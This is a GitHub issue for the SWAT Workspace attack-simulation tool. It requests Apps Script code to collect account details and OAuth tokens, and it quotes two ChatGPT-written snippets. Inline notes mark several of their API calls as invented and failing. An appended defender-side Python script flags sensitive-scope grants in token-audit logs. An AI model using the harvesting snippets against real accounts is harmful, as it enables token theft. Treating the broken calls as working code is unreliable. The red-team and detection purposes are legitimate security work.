elastic / SWAT

Simple Workspace Attack Tool (SWAT) is a tool for simulating malicious behavior against Google Workspace in reference to the MITRE ATT&CK framework.
Apache License 2.0
152 stars 7 forks

[Feature Request] Add Google AppScripts for use with Phishing Payload and Email Modules #10

Open DefSecSentinel opened 1 year ago

DefSecSentinel commented 1 year ago

Google App Scripts

Initial Access SWAT collection script

Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.

Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled

Collect:
- Account name
- Email address
- Account permissions
- App access tokens
- OAuth tokens

ChatGPT Example Script:

Google Workspace Admin

```javascript
function getAccountInfo() {
  var email = Session.getActiveUser().getEmail();
  // Requires the Admin SDK advanced service (AdminDirectory) to be enabled for the script project.
  var account = AdminDirectory.Users.get(email);
  var accountName = account.name.fullName;
  // NOTE: AdminDirectory.Users has no getImapSettings() or getOAuth2Tokens() methods;
  // the three calls below are ChatGPT inventions and throw at runtime as written.
  var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility;
  var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
  var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items; // duplicates the line above

  Logger.log("Account Name: " + accountName);
  Logger.log("Email Address: " + email);
  Logger.log("Account Permissions: " + accountPermissions);
  Logger.log("App Access Tokens: " + appAccessTokens);
  Logger.log("OAuth Tokens: " + oAuthTokens);
}
```

Google Workspace Non-Admin

```javascript
function getUserInfo() {
  var user = Session.getActiveUser();
  var email = user.getEmail();
  var name = user.getUsername(); // User.getUsername() is deprecated in Apps Script
  var accessToken = ScriptApp.getOAuthToken(); // the script's own OAuth token for its granted scopes
  // NOTE: ScriptApp.getAuthorizationInfo() takes a ScriptApp.AuthMode value, not a scope URL,
  // and the returned AuthorizationInfo has no getAccessToken() method; this line throws as written.
  var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken();
  var userInfo = {
    'name': name,
    'email': email,
    'accessToken': accessToken,
    'appAccessToken': appAccessToken
  };
  Logger.log(userInfo);
}
```
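The defender-side view of the request above, added here as an example that is not part of this issue or of the SWAT project: a script of this kind only gets at directory data or tokens after a user authorizes it for the relevant OAuth scopes, and every such grant is written to the Workspace token audit log. The code below scans a list of token-audit activity records for `authorize` events whose scopes fall in a sensitive set. The record layout (`id.time`, `actor.email`, `events[].name`, `events[].parameters[]` with `value`/`multiValue`) is assumed to match what the Admin SDK Reports API returns for `applicationName=token`; the sample records, client IDs, app names and the `SENSITIVE_SCOPES` set are all constructed for illustration and should be tuned to the tenant.

```python
"""Flag OAuth authorizations in Workspace token-audit records that grant
scopes exposing directory data, mail or script-level access.

Sample records are constructed, not real log data; field names are assumed
to follow the Reports API token-audit schema."""
import json
from typing import Dict, Iterable, List

# Assumed watch-list: scopes a reviewer would want to see granted to a new
# Apps Script project or third-party client.  Adjust per tenant policy.
SENSITIVE_SCOPES = {
    "https://www.googleapis.com/auth/admin.directory.user",
    "https://www.googleapis.com/auth/admin.directory.user.readonly",
    "https://www.googleapis.com/auth/admin.directory.user.security",
    "https://www.googleapis.com/auth/script.external_request",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/gmail.send",
}

# Constructed sample of three token-audit items: one grant of sensitive scopes
# to an unnamed Apps Script project, one benign sign-in grant, one revoke.
SAMPLE_ACTIVITIES = json.loads("""
[
  {
    "id": {"time": "2024-03-01T10:15:00.000Z", "applicationName": "token"},
    "actor": {"email": "alice@example.com", "profileId": "100000000000000000001"},
    "events": [{"type": "auth", "name": "authorize", "parameters": [
      {"name": "client_id", "value": "1234567890-constructed.apps.googleusercontent.com"},
      {"name": "app_name", "value": "Untitled project"},
      {"name": "client_type", "value": "WEB"},
      {"name": "scope", "multiValue": [
        "https://www.googleapis.com/auth/userinfo.email",
        "https://www.googleapis.com/auth/admin.directory.user",
        "https://www.googleapis.com/auth/script.external_request"]}]}]
  },
  {
    "id": {"time": "2024-03-01T10:20:00.000Z", "applicationName": "token"},
    "actor": {"email": "bob@example.com", "profileId": "100000000000000000002"},
    "events": [{"type": "auth", "name": "authorize", "parameters": [
      {"name": "client_id", "value": "9876543210-constructed.apps.googleusercontent.com"},
      {"name": "app_name", "value": "Calendar Sync"},
      {"name": "scope", "multiValue": ["openid", "https://www.googleapis.com/auth/userinfo.email"]}]}]
  },
  {
    "id": {"time": "2024-03-01T10:25:00.000Z", "applicationName": "token"},
    "actor": {"email": "carol@example.com", "profileId": "100000000000000000003"},
    "events": [{"type": "auth", "name": "revoke", "parameters": [
      {"name": "client_id", "value": "1234567890-constructed.apps.googleusercontent.com"},
      {"name": "scope", "multiValue": ["https://www.googleapis.com/auth/gmail.readonly"]}]}]
  }
]
""")


def _parameters(event: dict) -> Dict[str, List[str]]:
    """Flatten an event's parameter list into name -> list of string values."""
    out: Dict[str, List[str]] = {}
    for p in event.get("parameters", []):
        values = p.get("multiValue") or ([p["value"]] if "value" in p else [])
        out.setdefault(p["name"], []).extend(values)
    return out


def sensitive_authorizations(items: Iterable[dict], sensitive=SENSITIVE_SCOPES) -> List[dict]:
    """Return one finding per 'authorize' event that granted a watched scope.

    Revokes and other event names are ignored; findings carry the actor, the
    client that was authorized and the sorted list of matching scopes."""
    findings = []
    for item in items:
        actor = item.get("actor", {}).get("email", "<unknown>")
        when = item.get("id", {}).get("time", "")
        for ev in item.get("events", []):
            if ev.get("name") != "authorize":
                continue
            params = _parameters(ev)
            hits = sorted(set(params.get("scope", [])) & set(sensitive))
            if hits:
                findings.append({
                    "time": when,
                    "actor": actor,
                    "app_name": (params.get("app_name") or ["<unnamed>"])[0],
                    "client_id": (params.get("client_id") or [""])[0],
                    "scopes": hits,
                })
    return findings


if __name__ == "__main__":
    for f in sensitive_authorizations(SAMPLE_ACTIVITIES):
        print(f"{f['time']} {f['actor']} authorized '{f['app_name']}' "
              f"({f['client_id']}) for: {', '.join(f['scopes'])}")
```

In a real pipeline the `SAMPLE_ACTIVITIES` list would be replaced by pages from `activities.list(userKey='all', applicationName='token')`; a finding for an unnamed or newly seen `client_id` against admin-directory or mail scopes is the signal to review the script project and, if unexpected, revoke the grant from the admin console.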
DefSecSentinel commented 1 year ago

This is a work in progress.